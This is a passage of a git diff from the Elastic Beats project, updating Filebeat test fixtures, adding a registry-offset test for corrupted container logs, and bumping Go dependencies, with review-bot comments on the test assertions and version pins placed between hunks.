@@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/traefik/access/test/test.log-expected.json b/filebeat/module/traefik/access/test/test.log-expected.json index 631673fe351..38a386e6503 100644 --- a/filebeat/module/traefik/access/test/test.log-expected.json +++ b/filebeat/module/traefik/access/test/test.log-expected.json @@ -33,6 +33,7 @@ "url.original": "/ui/favicons/favicon-16x16.png", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "user_agent.os.name": "Linux", @@ -82,6 +83,7 @@ "url.original": "/ui/favicons/favicon.ico", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36", "user_agent.os.name": "Linux", @@ -130,6 +132,7 @@ "url.original": "/en/", "user.name": "-", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Mobile Safari", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1", "user_agent.os.full": "iOS 11.2.5", @@ -171,6 +174,7 @@ "url.original": "/", "user.name": "-", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.62.0", "user_agent.version": "7.62.0" 
@@ -218,6 +222,7 @@ "url.original": "/assets/52f8f2e711d235d76044799e/owners?oauth_token=ya29.GltABOXd_gtG-XVvYX2YhxXJiXVvbHRMXn9fbzc_mDfl2rDhqK0CrAlwuwwRWnNnEaMDwkmyI7-QGbRSB0Hzje2cc__FjTQ1iuiYTSIBaIPfxSWip5jx6zqvsVVo", "user.name": "-", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Phone", "user_agent.name": "Other", "user_agent.original": "Android", "user_agent.os.name": "Android" @@ -265,6 +270,7 @@ "url.original": "/marketplace/tax?oauth_token=ya29.Gl0fBWnrJ7DcEU-tN-O3Vxn2XZVaz2I-hFTjP1JQzhYFVT-SKtlmo9hSzrx3n82LUwUxJ1s5lmU8U3Mc9gA_aCxBk49ShYEwvmYOWxJJyldDIJ7hY4us4LoiSY1OqAM", "user.name": "-", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Phone", "user_agent.name": "Other", "user_agent.original": "Android", "user_agent.os.name": "Android" diff --git a/filebeat/tests/files/logs/docker_corrupted.log b/filebeat/tests/files/logs/docker_corrupted.log new file mode 100644 index 00000000000..b241a2691b9 --- /dev/null +++ b/filebeat/tests/files/logs/docker_corrupted.log 
@@ -0,0 +1,21 @@ +{"log":"Fetching main repository github.com/elastic/beats...\n","stream":"stdout","time":"2016-03-02T22:58:51.338462311Z"} +{"log":"Fetching dependencies...\n","stream":"stdout","time":"2016-03-02T22:59:04.609292428Z"} +{"log":"Execute /scripts/packetbeat_before_build.sh\n","stream":"stdout","time":"2016-03-02T22:59:04.617434682Z"} +{"log":"patching file vendor/github.com/tsg/gopacket/pcap/pcap.go\n","stream":"stdout","time":"2016-03-02T22:59:04.626534779Z"} +{"log":"cp etc/packetbeat.template.json /build/packetbeat.template.json\n","stream":"stdout","time":"2016-03-02T22:59:04.639782988Z"} +{"log":"# linux\n","stream":"stdout","time":"2016-03-02T22:59:04.646276053Z"} +"log":"cp packetbeat.yml /build/packetbeat-linux.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.647847045Z"} +{"log":"# binary\n","stream":"stdout","time":"2016-03-02T22:59:04.653740138Z"} +{"log":"cp packetbeat.yml /build/packetbeat-binary.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.655979016Z"} +{"log":"# darwin\n","stream":"stdout","time":"2016-03-02T22:59:04.661181197Z"} +{"log":"cp packetbeat.yml /build/packetbeat-darwin.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.662859769Z"} +{"log":"sed -i.bk 's/device: any/device: en0/' /build/packetbeat-darwin.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.66649744Z"} +{"log":"rm /build/packetbeat-darwin.yml.bk\n","stream":"stdout","time":"2016-03-02T22:59:04.701199002Z"} +{"log":"# win\n","stream":"stdout","time":"2016-03-02T22:59:04.705067809Z"} +{"log":"cp packetbeat.yml /build/packetbeat-win.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.706629907Z"} +{"log":"sed -i.bk 's/device: any/device: 0/' /build/packetbeat-win.yml\n","stream":"stdout","time":"2016-03-02T22:59:04.711993313Z"} +{"log":"rm /build/packetbeat-win.yml.bk\n","stream":"stdout","time":"2016-03-02T22:59:04.757913979Z"} +{"log":"Compiling for windows/amd64...\n","stream":"stdout","time":"2016-03-02T22:59:04.761895467Z"} 
+{"log":"Compiling for windows/386...\n","stream":"stdout","time":"2016-03-02T22:59:29.481736885Z"} +{"log":"Compiling for darwin/amd64...\n","stream":"stdout","time":"2016-03-02T22:59:55.205334574Z"} +{"log":"Moving binaries to host...\n","stream":"stdout","time":"2016-03-02T23:00:15.140397826Z"} diff --git a/filebeat/tests/system/test_container.py b/filebeat/tests/system/test_container.py index ee0df7eb8e9..067eabd1977 100644 --- a/filebeat/tests/system/test_container.py +++ b/filebeat/tests/system/test_container.py @@ -66,3 +66,42 @@ def test_container_input_cri(self): output = self.read_output() assert len(output) == 1 assert output[0]["stream"] == "stdout" + + def test_container_input_registry_for_unparsable_lines(self): + """ + Test container input properly updates registry offset in case + of unparsable lines + """ + input_raw = """ +- type: container + paths: + - {}/logs/*.log +""" + self.render_config_template( + input_raw=input_raw.format(os.path.abspath(self.working_dir)), + inputs=False, + ) + + os.mkdir(self.working_dir + "/logs/") + self.copy_files(["logs/docker_corrupted.log"], + target_dir="logs") + + filebeat = self.start_beat() + + self.wait_until(lambda: self.output_has(lines=20)) + + filebeat.check_kill_and_wait() + + output = self.read_output() + assert len(output) == 20 + assert output[19]["message"] == "Moving binaries to host..." + for o in output: + assert o["stream"] == "stdout" + + # Check that file exist + data = self.get_registry() + logs = self.log_access() + assert logs.contains("Parse line error") == True + # bytes of healthy file are 2244 so for the corrupted one should + # be 2244-1=2243 since we removed one character + assert data[0]["offset"] == 2243 diff --git a/filebeat/tests/system/test_modules.py b/filebeat/tests/system/test_modules.py index dc5d42c6472..c44550e351a 100644 --- a/filebeat/tests/system/test_modules.py +++ b/filebeat/tests/system/test_modules.py 
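Review bot: The last assertion in `test_container_input_registry_for_unparsable_lines` pins the registry offset to the literal 2243, which ties the test to the exact on-disk byte count of `docker_corrupted.log`; a checkout that rewrites line endings would change that count and fail the test for a reason unrelated to offset handling. Deriving the expectation from the copied fixture keeps the intent, which is that the offset advances past the unparsable line to the end of the file: `assert data[0]["offset"] == os.path.getsize(os.path.join(self.working_dir, "logs", "docker_corrupted.log"))`, assuming `copy_files` places the fixture under `working_dir/logs` as the input path suggests. Two smaller points: `assert logs.contains("Parse line error") == True` reads better as `assert logs.contains("Parse line error")`, and the comment `# Check that file exist` does not describe the checks that follow, so `# Registry offset must cover the whole file, including the skipped line` would fit better. The enclosing test class starts outside the hunk.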
@@ -150,7 +150,7 @@ def run_on_file(self, module, fileset, test_file, cfgfile): bufsize=0).wait() # List of errors to check in filebeat output logs - errors = ["Error loading pipeline for fileset"] + errors = ["error loading pipeline for fileset"] # Checks if the output of filebeat includes errors contains_error, error_line = file_contains(os.path.join(output_path, "output.log"), errors) assert contains_error is False, "Error found in log:{}".format(error_line) diff --git a/generator/_templates/beat/{beat}/README.md b/generator/_templates/beat/{beat}/README.md index 31e69936690..7396c5edd80 100644 --- a/generator/_templates/beat/{beat}/README.md +++ b/generator/_templates/beat/{beat}/README.md @@ -16,7 +16,7 @@ To get running with {Beat} and also install the dependencies, run the following command: ``` -make setup +make update ``` It will create a clean git history for each major step. Note that you can always rewrite the history if you wish before pushing your changes. diff --git a/generator/_templates/metricbeat/{beat}/README.md b/generator/_templates/metricbeat/{beat}/README.md index b632585b636..cc773977f83 100644 --- a/generator/_templates/metricbeat/{beat}/README.md +++ b/generator/_templates/metricbeat/{beat}/README.md @@ -8,7 +8,7 @@ To get started run the following command. This command should only be run once. ``` -make setup +make update ``` It will ask you for the module and metricset name. Insert the name accordingly. diff --git a/go.mod b/go.mod index 504fe58a826..15bb085efab 100644 --- a/go.mod +++ b/go.mod @@ -60,7 +60,7 @@ require ( github.com/eapache/go-resiliency v1.2.0 github.com/eclipse/paho.mqtt.golang v1.2.1-0.20200121105743-0d940dd29fd2 github.com/elastic/ecs v1.8.0 - github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a + github.com/elastic/elastic-agent-client/v7 v7.0.0-20210308165121-7dd05ee2b5a5 github.com/elastic/go-concert v0.1.0 github.com/elastic/go-libaudit/v2 v2.2.0 github.com/elastic/go-licenser v0.3.1 
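Review bot: The `errors` list in `run_on_file` feeds a negative check (`assert contains_error is False`), so a literal that no longer matches the emitted message makes the check pass without detecting anything, which is presumably why the casing had to be changed here. If `file_contains` does a case-sensitive substring match (the helper is outside the hunk), listing both spellings keeps the guard effective whichever form the log uses: `errors = ["Error loading pipeline for fileset", "error loading pipeline for fileset"]`. `run_on_file` starts and ends outside the hunk.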
@@ -73,7 +73,7 @@ require ( github.com/elastic/go-txfile v0.0.7 github.com/elastic/go-ucfg v0.8.3 github.com/elastic/go-windows v1.0.1 // indirect - github.com/elastic/gosigar v0.14.0 + github.com/elastic/gosigar v0.14.1 github.com/fatih/color v1.9.0 github.com/fsnotify/fsevents v0.1.1 github.com/fsnotify/fsnotify v1.4.9 @@ -87,13 +87,13 @@ require ( github.com/gofrs/flock v0.7.2-0.20190320160742-5135e617513b github.com/gofrs/uuid v3.3.0+incompatible github.com/gogo/protobuf v1.3.1 - github.com/golang/protobuf v1.4.2 + github.com/golang/protobuf v1.4.3 github.com/golang/snappy v0.0.1 github.com/gomodule/redigo v1.8.3 github.com/google/flatbuffers v1.7.2-0.20170925184458-7a6b2bf521e9 github.com/google/go-cmp v0.5.2 github.com/google/gopacket v1.1.18-0.20191009163724-0ad7f2610e34 - github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f + github.com/google/uuid v1.1.2 github.com/gorhill/cronexpr v0.0.0-20180427100037-88b0669f7d75 github.com/gorilla/mux v1.7.2 // indirect github.com/grpc-ecosystem/grpc-gateway v1.13.0 // indirect @@ -111,6 +111,7 @@ require ( github.com/josephspurrier/goversioninfo v0.0.0-20190209210621-63e6d1acd3dd github.com/jpillora/backoff v1.0.0 // indirect github.com/kardianos/service v1.1.0 + github.com/kolide/osquery-go v0.0.0-20200604192029-b019be7063ac github.com/konsorten/go-windows-terminal-sequences v1.0.2 // indirect github.com/lib/pq v1.1.2-0.20190507191818-2ff3cb3adc01 github.com/magefile/mage v1.11.0 
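Review bot: The new requirement `github.com/kolide/osquery-go v0.0.0-20200604192029-b019be7063ac` in the `@@ -111,6 +111,7 @@` hunk is a pseudo-version, meaning a pin to one commit rather than a tagged release. The go.sum hunks also add `github.com/apache/thrift` at a pseudo-version, apparently as a transitive dependency. Commit pins are harder to track against upstream fixes than tags, so a trailing comment recording why this commit was chosen would help the next bump, for example `// pinned to commit: <reason>; move to a tagged release when available`. If upstream publishes a suitable tag, requiring that instead would be preferable.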
@@ -165,17 +166,17 @@ require ( go.uber.org/zap v1.14.0 golang.org/x/crypto v0.0.0-20200820211705-5c72a883971a golang.org/x/lint v0.0.0-20200130185559-910be7a94367 - golang.org/x/net v0.0.0-20200904194848-62affa334b73 + golang.org/x/net v0.0.0-20210226172049-e18ecbb05110 golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a - golang.org/x/sys v0.0.0-20201009025420-dfb3f7c4e634 - golang.org/x/text v0.3.3 + golang.org/x/sys v0.0.0-20210308170721-88b6017d0656 + golang.org/x/text v0.3.5 golang.org/x/time v0.0.0-20191024005414-555d28b269f0 - golang.org/x/tools v0.0.0-20200904185747-39188db58858 + golang.org/x/tools v0.0.0-20200731060945-b5fad4ed8dd6 google.golang.org/api v0.15.0 - google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013 + google.golang.org/genproto v0.0.0-20210303154014-9728d6b83eeb google.golang.org/grpc v1.29.1 - google.golang.org/protobuf v1.24.0 + google.golang.org/protobuf v1.25.0 gopkg.in/inf.v0 v0.9.1 gopkg.in/jcmturner/gokrb5.v7 v7.5.0 gopkg.in/mgo.v2 v2.0.0-20160818020120-3f83fa500528 diff --git a/go.sum b/go.sum index 4fcc1ef0c5c..37d3e0d8d19 100644 --- a/go.sum +++ b/go.sum 
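Review bot: In this hunk `golang.org/x/tools` moves from `v0.0.0-20200904185747-39188db58858` to `v0.0.0-20200731060945-b5fad4ed8dd6`, an older commit by its timestamp, while every other changed requirement in the hunk moves forward. If the downgrade is a side effect of resolving the newly added dependencies rather than a deliberate choice, it is worth confirming that nothing in the build relies on the newer revision. If it is intentional, a short trailing comment such as `// held back: <reason>` would stop a later tidy-up from silently reverting it.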
@@ -111,6 +111,8 @@ github.com/andrewkroh/sys v0.0.0-20151128191922-287798fe3e43/go.mod h1:tJPYQG4mn github.com/antihax/optional v0.0.0-20180407024304-ca021399b1a6/go.mod h1:V8iCPQYkqmusNa815XgQio277wI47sdRh1dUOLdyC6Q= github.com/antlr/antlr4 v0.0.0-20200820155224-be881fa6b91d h1:OE3kzLBpy7pOJEzE55j9sdgrSilUPzzj++FWvp1cmIs= github.com/antlr/antlr4 v0.0.0-20200820155224-be881fa6b91d/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y= +github.com/apache/thrift v0.13.1-0.20200603211036-eac4d0c79a5f h1:33BV5v3u8I6dA2dEoPuXWCsAaHHOJfPtdxZhAMQV4uo= +github.com/apache/thrift v0.13.1-0.20200603211036-eac4d0c79a5f/go.mod h1:cp2SuWMxlEZw2r+iP2GNCdIi4C1qmUzdZFSVb+bacwQ= github.com/apoydence/eachers v0.0.0-20181020210610-23942921fe77 h1:afT88tB6u9JCKQZVAAaa9ICz/uGn5Uw9ekn6P22mYKM= github.com/apoydence/eachers v0.0.0-20181020210610-23942921fe77/go.mod h1:bXvGk6IkT1Agy7qzJ+DjIw/SJ1AaB3AvAuMDVV+Vkoo= github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5doyWs3UAsr3K4I6qtAmlQcZDesFNEHPZAzj8= 
@@ -245,8 +247,8 @@ github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3 h1:lnDkqiRFKm0rxdljqr github.com/elastic/dhcp v0.0.0-20200227161230-57ec251c7eb3/go.mod h1:aPqzac6AYkipvp4hufTyMj5PDIphF3+At8zr7r51xjY= github.com/elastic/ecs v1.8.0 h1:wa61IDQsQcZyJa6hwbhqGO+631H+kGHhe0J4V7tMPZY= github.com/elastic/ecs v1.8.0/go.mod h1:pgiLbQsijLOJvFR8OTILLu0Ni/R/foUNg0L+T6mU9b4= -github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a h1:2NHgf1RUw+f240lpTnLrCp1aBNvq2wDi0E1A423/S1k= -github.com/elastic/elastic-agent-client/v7 v7.0.0-20200709172729-d43b7ad5833a/go.mod h1:uh/Gj9a0XEbYoM4NYz4LvaBVARz3QXLmlNjsrKY9fTc= +github.com/elastic/elastic-agent-client/v7 v7.0.0-20210308165121-7dd05ee2b5a5 h1:n4VHMzwk4o8+0zTCDej1M6uUR9rkzScpSeZXi0B8y1w= +github.com/elastic/elastic-agent-client/v7 v7.0.0-20210308165121-7dd05ee2b5a5/go.mod h1:uh/Gj9a0XEbYoM4NYz4LvaBVARz3QXLmlNjsrKY9fTc= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270 h1:cWPqxlPtir4RoQVCpGSRXmLqjEHpJKbR60rxh1nQZY4= github.com/elastic/fsevents v0.0.0-20181029231046-e1d381a4d270/go.mod h1:Msl1pdboCbArMF/nSCDUXgQuWTeoMmE/z8607X+k7ng= github.com/elastic/go-concert v0.1.0 h1:gz/yvA3bseuHzoF/lNMltkL30XdPqMo+bg5o2mBx2EE= 
@@ -278,8 +280,8 @@ github.com/elastic/go-ucfg v0.8.3/go.mod h1:iaiY0NBIYeasNgycLyTvhJftQlQEUO2hpF+F github.com/elastic/go-windows v1.0.0/go.mod h1:TsU0Nrp7/y3+VwE82FoZF8gC/XFg/Elz6CcloAxnPgU= github.com/elastic/go-windows v1.0.1 h1:AlYZOldA+UJ0/2nBuqWdo90GFCgG9xuyw9SYzGUtJm0= github.com/elastic/go-windows v1.0.1/go.mod h1:FoVvqWSun28vaDQPbj2Elfc0JahhPB7WQEGa3c814Ss= -github.com/elastic/gosigar v0.14.0 h1:5w470Q8AagzVY8U48ab8rVkQrOXiIK1NHBYWrAxi9kI= -github.com/elastic/gosigar v0.14.0/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= +github.com/elastic/gosigar v0.14.1 h1:T0aQ7n/n2ZA9W7DmAnj60v+qzqKERdBgJBO1CG2W6rc= +github.com/elastic/gosigar v0.14.1/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877 h1:C9LsbipColsz04JKpKoLlp0pgMJRLq2uXVTeKRDcNcY= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877/go.mod h1:g5s5osgELxgM+Md9Qni9rzo7Rbt+vvFQI4bt/Mc93II= github.com/elazarl/goproxy v0.0.0-20180725130230-947c36da3153 h1:yUdfgN0XgIJw7foRItutHYUIhlcKzcSf5vDpdhQAKTc= @@ -366,6 +368,8 @@ github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvq github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= github.com/golang/protobuf v1.4.2 h1:+Z5KGCizgyZCbGh1KZqA0fcLLkwbsjIzS4aV2v7wJX0= github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3 h1:JjCZWpVbqXDqFVmTfYWEVTMIYrL/NPdPSCHPJ0T/raM= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/snappy v0.0.1 h1:Qgr9rKW7uDUkrbSmQeiDsGa8SjGyCOGtuasMWwvp2P4= github.com/golang/snappy v0.0.1/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= github.com/gomodule/redigo v1.8.3 h1:HR0kYDX2RJZvAup8CsiJwxB4dTCSC0AaUq6S4SiLwUc= 
@@ -378,6 +382,7 @@ github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5a github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.2 h1:X2ev0eStA3AbceY54o37/0PQ/UWqKEiiO2dKL5OPaFM= github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= @@ -394,8 +399,8 @@ github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm4 github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaUGG7oYTSPP8MxqL4YI3kZKwcP4= github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.1.1/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= -github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f h1:XXzyYlFbxK3kWfcmu3Wc+Tv8/QQl/VqwsWuSYF1Rj0s= -github.com/google/uuid v1.1.2-0.20190416172445-c2e93f3ae59f/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/google/uuid v1.1.2 h1:EVhdT+1Kseyi1/pUmXKaFxYsDNy9RQYkMWRH68J/W7Y= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= github.com/googleapis/gax-go/v2 v2.0.5 h1:sjZBwGj9Jlw33ImPtvFviGYvseOtDM7hkSKB7+Tv3SM= github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= 
@@ -489,6 +494,8 @@ github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQL github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/klauspost/compress v1.11.0 h1:wJbzvpYMVGG9iTI9VxpnNZfd4DzMPoCWze3GgSqz8yg= github.com/klauspost/compress v1.11.0/go.mod h1:aoV0uJVorq1K+umq18yTdKaF57EivdYsUV+/s2qKfXs= +github.com/kolide/osquery-go v0.0.0-20200604192029-b019be7063ac h1:TI5z/itepBADxlaodO5U9mmrMHPu8Wb8Jt9Gea6vK4Y= +github.com/kolide/osquery-go v0.0.0-20200604192029-b019be7063ac/go.mod h1:rp36fokOKgd/5mOgbvv4fkpdaucQ43mnvb+8BR62Xo8= github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= github.com/konsorten/go-windows-terminal-sequences v1.0.2 h1:DB17ag19krx9CFsz4o3enTrPXyIXCl+2iCXH/aMAp9s= github.com/konsorten/go-windows-terminal-sequences v1.0.2/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= @@ -825,6 +832,8 @@ golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/ golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= golang.org/x/net v0.0.0-20200904194848-62affa334b73 h1:MXfv8rhZWmFeqX3GNZRsd6vOLoaCHjYEX3qkRo3YBUA= golang.org/x/net v0.0.0-20200904194848-62affa334b73/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110 h1:qWPm9rbaAMKs8Bq/9LRpbMqxWRVUAQwMI9fVrssnTfw= +golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190130055435-99b60b757ec1/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= 
@@ -841,6 +850,7 @@ golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJ golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a h1:WXEvlFVvvGxCJLG6REjsT03iWnKLEWinaScsxF2Vm2o= golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20180810173357-98c5dad5d1a0/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20180815093151-14742f9018cd/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 
@@ -878,11 +888,17 @@ golang.org/x/sys v0.0.0-20200615200032-f1bc736245b1/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20200622214017-ed371f2e16b4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201009025420-dfb3f7c4e634 h1:bNEHhJCnrwMKNMmOx3yAynp5vs5/gRy+XWFtZFu7NBM= golang.org/x/sys v0.0.0-20201009025420-dfb3f7c4e634/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210308170721-88b6017d0656 h1:FuBaiPCiXkq4v+JY5JEGPU/HwEZwpVyDbu/KBz9fU+4= +golang.org/x/sys v0.0.0-20210308170721-88b6017d0656/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3 h1:cokOdA+Jmi5PJGXLlLllQSgYigAEfHXJAERHVMaCc2k= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5 h1:i6eZZ+zk0SOf0xgBpEpPD18qWcJda6q1sxt3S0kzyUQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20191024005414-555d28b269f0 h1:/5xXl8Y5W96D+TtHSlonuFqGHIWVuyCkGJLwGh9JJFs= 
@@ -919,6 +935,8 @@ google.golang.org/genproto v0.0.0-20190927181202-20e1ac93f88c/go.mod h1:IbNlFCBr google.golang.org/genproto v0.0.0-20191230161307-f3c370f40bfb/go.mod h1:n3cpQtvxv34hfy77yVDNjmbRyujviMdxYliBSkLhpCc= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013 h1:+kGHl1aib/qcwaRi1CbqBZ1rk19r85MNUf8HaBghugY= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= +google.golang.org/genproto v0.0.0-20210303154014-9728d6b83eeb h1:hcskBH5qZCOa7WpTUFUFvoebnSFZBYpjykLtjIp9DVk= +google.golang.org/genproto v0.0.0-20210303154014-9728d6b83eeb/go.mod h1:FWY/as6DDZQgahTzZj3fqbO1CbirC29ZNUFHwi0/+no= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= google.golang.org/grpc 